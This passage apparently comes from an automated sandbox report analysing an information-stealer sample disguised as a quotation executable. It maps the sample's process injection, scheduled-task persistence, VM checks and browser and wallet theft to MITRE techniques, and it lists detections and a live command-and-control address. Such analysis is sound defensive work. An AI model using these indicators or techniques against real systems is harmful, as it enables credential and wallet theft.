                        Source: Yara matchFile source: 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.566287546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: QUOTATION 061622.exe PID: 5992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 4224, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5108, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 6324, type: MEMORYSTR
                        Yara detected Ficker Stealer
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5108, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        1
                        Valid Accounts                        		221
                        Windows Management Instrumentation                        		1
                        Valid Accounts                        		1
                        Valid Accounts                        		11
                        Masquerading                        		1
                        OS Credential Dumping                        		331
                        Security Software Discovery                        		Remote Services1
                        Archive Collected Data                        		Exfiltration Over Other Network Medium1
                        Encrypted Channel                        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default Accounts1
                        Scheduled Task/Job                        		1
                        Scheduled Task/Job                        		1
                        Access Token Manipulation                        		1
                        Valid Accounts                        		LSASS Memory11
                        Process Discovery                        		Remote Desktop Protocol3
                        Data from Local System                        		Exfiltration Over Bluetooth11
                        Non-Standard Port                        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)311
                        Process Injection                        		1
                        Access Token Manipulation                        		Security Account Manager241
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                        Non-Application Layer Protocol                        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)1
                        Scheduled Task/Job                        		1
                        Disable or Modify Tools                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object ModelInput CaptureScheduled Transfer2
                        Application Layer Protocol                        		SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script241
                        Virtualization/Sandbox Evasion                        		LSA Secrets1
                        Remote System Discovery                        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common311
                        Process Injection                        		Cached Domain Credentials123
                        System Information Discovery                        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                        Obfuscated Files or Information                        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 647019 Sample: QUOTATION 061622.exe Startdate: 16/06/2022 Architecture: WINDOWS Score: 100 68 Malicious sample detected (through community Yara rule) 2->68 70 Antivirus detection for URL or domain 2->70 72 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->72 74 9 other signatures 2->74 7 QUOTATION 061622.exe 2 2->7         started        11 Data.exe 1 2->11         started        13 Data.exe 2->13         started        process3 file4 50 C:\Users\user\...\QUOTATION 061622.exe.log, ASCII 7->50 dropped 76 Writes to foreign memory regions 7->76 78 Allocates memory in foreign processes 7->78 80 Injects a PE file into a foreign processes 7->80 15 vbc.exe 15 30 7->15         started        19 cmd.exe 3 7->19         started        22 cmd.exe 1 7->22         started        82 Multi AV Scanner detection for dropped file 11->82 24 vbc.exe 14 11->24         started        26 cmd.exe 1 11->26         started        28 cmd.exe 1 11->28         started        signatures5 process6 dnsIp7 52 api.ip.sb 15->52 54 185.222.58.90, 17910, 49780, 49849 ROOTLAYERNETNL Netherlands 15->54 58 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->58 60 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 15->60 62 Tries to steal Crypto Currency Wallets 15->62 30 conhost.exe 15->30         started        46 C:\Users\user\AppData\Roaming\Data\Data.exe, PE32 19->46 dropped 48 C:\Users\user\...\Data.exe:Zone.Identifier, ASCII 19->48 dropped 32 conhost.exe 19->32         started        64 Uses schtasks.exe or at.exe to add and modify task schedules 22->64 34 conhost.exe 22->34         started        36 schtasks.exe 1 22->36         started        56 api.ip.sb 24->56 66 Tries to harvest and steal browser information (history, passwords, etc) 24->66 38 conhost.exe 24->38         started        40 conhost.exe 26->40         started        42 schtasks.exe 26->42         started        44 conhost.exe 28->44         started        file8 signatures9 process10

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        QUOTATION 061622.exe45%VirustotalBrowse
                        QUOTATION 061622.exe49%ReversingLabsByteCode-MSIL.Trojan.Bulz
                        QUOTATION 061622.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\Data\Data.exe49%ReversingLabsByteCode-MSIL.Trojan.Bulz

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        5.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1234943Download File
                        21.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1234943Download File
                        5.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1234943Download File
                        21.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1234943Download File
                        21.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1234943Download File
                        21.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1234943Download File
                        21.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1234943Download File
                        5.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1234943Download File
                        5.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1234943Download File
                        5.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1234943Download File
                        21.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1234943Download File
                        5.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1234943Download File

                        Domains

                        SourceDetectionScannerLabelLink
                        api.ip.sb3%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                        http://185.222.58.90:17910X0%Avira URL Cloudsafe
                        http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                        http://tempuri.org/Endpoint/GetUpdates00%Avira URL Cloudsafe
                        http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                        http://tempuri.org/t_0%URL Reputationsafe
                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                        http://tempuri.org/0%URL Reputationsafe
                        http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                        http://ns.adobe.c/g0%URL Reputationsafe
                        http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                        http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                        http://185.222.58.90:1791000%Avira URL Cloudsafe
                        http://tempuri.org/Endpoint/SetEnvironmentX0%Avira URL Cloudsafe
                        https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                        http://185.222.58.90:17910/100%Avira URL Cloudmalware
                        http://185.222.58.90:17910100%Avira URL Cloudmalware
                        http://ns.adobe.c/gr0%Avira URL Cloudsafe
                        http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                        http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
                        http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnvironmentme00%Avira URL Cloudsafe
                        http://tempuri.org/00%URL Reputationsafe
                        https://api.ipify.orgcoo0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ip.sb
                        		unknown
                        		unknowntrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://185.222.58.90:17910/true
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://ipinfo.io/ip%appdata%vbc.exe, vbc.exe, 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/chrome_newtabvbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drfalse
                            		high
                            https://duckduckgo.com/ac/?q=vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drfalse
                              		high
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icovbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousvbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/Endpoint/CheckConnectResponsevbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://185.222.58.90:17910Xvbc.exe, 00000015.00000002.697046954.0000000006EB2000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		low
                                  http://schemas.datacontract.org/2004/07/vbc.exe, 00000005.00000002.573067688.0000000007711000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697164052.0000000006F85000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/GetUpdates0vbc.exe, 00000005.00000002.573067688.0000000007711000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/EnvironmentSettingsvbc.exe, 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/t_vbc.exe, 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%vbc.exe, vbc.exe, 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/soap/envelope/vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drfalse
                                      		high
                                      http://schemas.xmlsoap.org/soap/envelope/Dvbc.exe, 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697046954.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://tempuri.org/Endpoint/CheckConnectvbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchvbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drfalse
                                          		high
                                          http://ns.adobe.c/gvbc.exe, 00000015.00000002.695886074.00000000010DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/VerifyUpdateResponsevbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/SetEnvironmentvbc.exe, 00000015.00000002.698007004.000000000723C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697248055.0000000006FFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/SetEnvironmentResponsevbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/GetUpdatesvbc.exe, 00000015.00000002.697046954.0000000006EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://ac.ecosia.org/autocomplete?q=vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drfalse
                                            		high
                                            http://185.222.58.90:179100vbc.exe, 00000005.00000002.573067688.0000000007711000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://tempuri.org/Endpoint/SetEnvironmentXvbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://api.ipify.orgcookies//settinString.Removegvbc.exe, vbc.exe, 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmptrue
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2004/08/addressingvbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://185.222.58.90:17910vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698007004.000000000723C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697046954.0000000006EB2000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/faultvbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://ns.adobe.c/grvbc.exe, 00000015.00000003.679261338.000000000C631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://tempuri.org/Endpoint/GetUpdatesResponsevbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://tempuri.org/Endpoint/EnvironmentSettingsResponsevbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://tempuri.org/Endpoint/VerifyUpdatevbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://tempuri.org/Endpoint/SetEnvironmentme0vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://tempuri.org/0vbc.exe, 00000005.00000002.573067688.0000000007711000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drfalse
                                                    		high
                                                    https://api.ipify.orgcoovbc.exetrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/soap/actor/nextvbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
